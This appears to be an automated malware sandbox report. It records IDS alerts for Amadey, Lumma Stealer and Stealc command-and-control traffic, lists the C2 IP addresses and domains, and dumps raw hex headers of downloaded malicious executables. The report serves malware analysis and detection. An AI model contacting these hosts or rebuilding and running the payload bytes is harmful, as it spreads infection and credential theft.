                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeFile opened: C:\Users\user~1\AppData\Jump to behavior

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.7:49696 -> 176.113.115.6:80
                              Source: Network trafficSuricata IDS: 2060568 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (techspherxe .top) : 192.168.2.7:52157 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2060570 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (techspherxe .top in TLS SNI) : 192.168.2.7:49715 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2060570 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (techspherxe .top in TLS SNI) : 192.168.2.7:49717 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2060570 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (techspherxe .top in TLS SNI) : 192.168.2.7:49723 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.7:49724 -> 185.215.113.209:80
                              Source: Network trafficSuricata IDS: 2060570 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (techspherxe .top in TLS SNI) : 192.168.2.7:49721 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2856096 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M1) : 192.168.2.7:49724 -> 185.215.113.209:80
                              Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.7:49724 -> 185.215.113.209:80
                              Source: Network trafficSuricata IDS: 2060658 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (agroecologyguide .digital) in TLS SNI : 192.168.2.7:49733 -> 104.21.48.201:443
                              Source: Network trafficSuricata IDS: 2060570 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (techspherxe .top in TLS SNI) : 192.168.2.7:49727 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49732 -> 38.180.229.217:80
                              Source: Network trafficSuricata IDS: 2060657 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (agroecologyguide .digital) : 192.168.2.7:53182 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2060570 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (techspherxe .top in TLS SNI) : 192.168.2.7:49730 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.7:49732 -> 38.180.229.217:80
                              Source: Network trafficSuricata IDS: 2060570 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (techspherxe .top in TLS SNI) : 192.168.2.7:49735 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 38.180.229.217:80 -> 192.168.2.7:49732
                              Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.7:49732 -> 38.180.229.217:80
                              Source: Network trafficSuricata IDS: 2060570 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (techspherxe .top in TLS SNI) : 192.168.2.7:49737 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2060570 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (techspherxe .top in TLS SNI) : 192.168.2.7:49738 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 38.180.229.217:80 -> 192.168.2.7:49732
                              Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.7:49732 -> 38.180.229.217:80
                              Source: Network trafficSuricata IDS: 2060570 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (techspherxe .top in TLS SNI) : 192.168.2.7:49754 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2060536 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (explorebieology .run) : 192.168.2.7:49834 -> 1.1.1.1:53
                              Source: Network trafficSuricata IDS: 2060658 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (agroecologyguide .digital) in TLS SNI : 192.168.2.7:49759 -> 104.21.48.201:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49717 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.7:49721 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49735 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49735 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49715 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49715 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49738 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49754 -> 172.67.214.226:443
                              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49733 -> 104.21.48.201:443
                              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49733 -> 104.21.48.201:443
                              System process connects to network (likely due to code injection or exploit)
                              Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 185.183.32.103 3333
                              C2 URLs / IPs found in malware configuration
                              Source: Malware configuration extractorIPs: 176.113.115.6
                              Source: global trafficTCP traffic: 192.168.2.7:49708 -> 185.183.32.103:3333
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 17:10:13 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 11:07:52 GMTETag: "9ec0c8-62fbea24448ab"Accept-Ranges: bytesContent-Length: 10404040Content-Type: application/x-msdos-programData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 36 34 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 99 dc 14 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 4a 48 00 00 0c 56 00 00 00 00 00 00 58 48 00 00 10 00 00 00 00 40 00 00 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 05 00 02 00 05 00 02 00 00 00 00 00 00 c0 a0 00 00 04 00 00 fe e7 9e 00 02 00 00 00 00 00 10 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 50 52 00 9e 00 00 00 00 e0 51 00 ac 55 00 00 00 b0 59 00 87 02 47 00 00 f0 55 00 ec b2 03 00 00 5a 9e 00 c8 66 00 00 00 80 52 00 4c 65 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 52 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 f6 51 00 10 14 00 00 00 40 52 00 8e 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cc 49 48 00 00 10 00 00 00 4a 48 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 68 82 07 00 00 60 48 00 00 84 07 00 00 4e 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 dc e5 01 00 00 f0 4f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ac 55 00 00 00 e0 51 00 00 56 00 00 00 d2 4f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 8e 0f 00 00 00 40 52 00 00 10 00 00 00 28 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 9e 00 00 00 00 50 52 00 00 02 00 00 00 38 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 70 02 00 00 00 60 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 6d 00 00 00 00 70 52 00 00 02 00 00 00 3a 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 44 65 03 00 00 80 52 00 00 66 03 00 00 3c 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 70 64 61 74 61 00 00 ec b2 03 00 00 f0 55 00 00 b4 03 00 00 a2 53 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 17:10:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 11:00:14 GMTETag: "37ee8e-62faa69169064"Accept-Ranges: bytesContent-Length: 3665550Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 da e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 6e 00 00 00 ce 06 00 00 42 00 00 83 38 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 b0 14 00 00 04 00 00 e3 1f 38 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 9b 00 00 b4 00 00 00 00 40 0f 00 d8 52 05 00 00 00 00 00 00 00 00 00 3e b9 37 00 50 35 00 00 00 a0 07 00 64 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae 6d 00 00 00 10 00 00 00 6e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 62 2a 00 00 00 80 00 00 00 2c 00 00 00 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 bc 7e 06 00 00 b0 00 00 00 02 00 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 10 08 00 00 30 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 d8 52 05 00 00 40 0f 00 00 54 05 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 32 0f 00 00 00 a0 14 00 00 10 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 17:10:35 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 13:44:33 GMTETag: "6ecc00-62facb4bd9ae8"Accept-Ranges: bytesContent-Length: 7261184Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 37 1b ac e2 73 7a c2 b1 73 7a c2 b1 73 7a c2 b1 62 fc c1 b0 72 7a c2 b1 38 02 c3 b0 76 7a c2 b1 73 7a c3 b1 6b 7a c2 b1 8b fd c7 b0 72 7a c2 b1 8b fd 3d b1 72 7a c2 b1 73 7a 55 b1 72 7a c2 b1 8b fd c0 b0 72 7a c2 b1 52 69 63 68 73 7a c2 b1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5d 8d c9 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2b 00 6c 68 00 00 5c 06 00 00 00 00 00 c0 14 00 00 00 10 00 00 00 80 68 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 6f 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 82 68 00 3c 00 00 00 00 a0 68 00 50 49 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 6e 00 60 09 00 00 a8 80 68 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 68 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0b 6b 68 00 00 10 00 00 00 6c 68 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c 04 00 00 00 80 68 00 00 06 00 00 00 70 68 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 30 00 00 00 00 90 68 00 00 02 00 00 00 76 68 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 49 06 00 00 a0 68 00 00 4a 06 00 00 78 68 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 09 00 00 00 f0 6e 00 00 0a 00 00 00 c2 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 17:10:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Fri, 07 Mar 2025 08:26:58 GMTETag: "5d600-62fbc62d1c31e"Accept-Ranges: bytesContent-Length: 382464Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 cd 52 8a 8f 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 22 00 00 00 08 00 00 00 00 00 00 16 3b 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 06 00 00 04 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 3a 00 00 4f 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 30 3a 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 20 00 00 00 20 00 00 00 22 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9c 05 00 00 00 60 00 00 00 06 00 00 00 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 00 00 00 02 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 43 53 53 00 00 00 00 00 a8 05 00 00 a0 00 00 00 a8 05 00 00 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 07 Mar 2025 17:10:52 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Thu, 06 Mar 2025 15:34:23 GMTETag: "156000-62fae3d90495a"Accept-Ranges: bytesContent-Length: 1400832Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 16 a4 c8 67 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 08 00 00 56 15 00 00 08 00 00 00 00 00 00 2e 74 15 00 00 20 00 00 00 80 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 73 15 00 4b 00 00 00 00 80 15 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 15 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 54 15 00 00 20 00 00 00 56 15 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 05 00 00 00 80 15 00 00 06 00 00 00 58 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 15 00 00 02 00 00 00 5e 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 74 15 00 00 00 00 00 48 00 00 00 02 00 05 00 28 e4 01 00 d0 fc 00 00 03 00 00 00 04 00 00 06 f8 e0 02 00 e2 92 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 00 00 1a 28 01 00 00 06 2a 00 13 30 03 00 b8 00 00 00 01 00 00 11 20 02 00 00 00 fe 0e 01 00 38 00 00 00 00 fe 0c 01 00 45 04 00 00 00 64 00 00 00 05 00 00 00 2c 00 00 00 57 00 00 00 38 5f 00 00 00 12 00 15 7d 02 00 00 04 20 00 00 00 00 7e e2 00 00 04 7b c4 00 00 04 3a ca ff ff ff 26 20 00 00 00 00 38 bf ff ff ff 12 00 28 01 00 00 0a 7d 03 00 00 04 20 01 00 00 00 7e e2 00 00 04 7b d7 00 00 04 39 9f ff ff ff 26 20 00 00 00 00 38 94 ff ff ff 12 00 7c 03 00 00 04 28 02 00 00 0a 2a 12 00 7c 03 00 00 04 12 00 28 01 00 00 2b 20 03 00 00 00 7e e2 00 00 04 7b ac 00 00 04 39 65 ff ff ff 26 20 03 00 00 00 38 5a ff ff ff 13 30 03 00 7b 00 00 00 02 00 00 11 20 02 00 00 00 fe 0e 01 00 38 00 00 00 00 fe 0c 01 00 45 03 00 00 00 57 00 00 00 05 00 00 00 2b 00 00 00 38 52 00 00 00 12 00 28 04 00 00 0a 20 00 00 00 00 7e e2 00 00 04 7b e9 00 00 04 3a cf ff ff ff 26 20 00 00 00 00 38 c4 ff ff ff 02 28 03 00 00 06 6f 05 00 00 0a 13 00 20 01 00 00 00 7e e2 00 00 04
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 07 Mar 2025 17:11:03 GMTContent-Type: application/octet-streamContent-Length: 439296Last-Modified: Thu, 30 Jan 2025 18:34:28 GMTConnection: keep-aliveETag: "679bc634-6b400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 34 c6 9b 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 00 02 00 00 00 00 00 b7 9f 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 07 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 45 06 00 c8 00 00 00 00 d0 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 c4 45 00 00 d8 e1 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 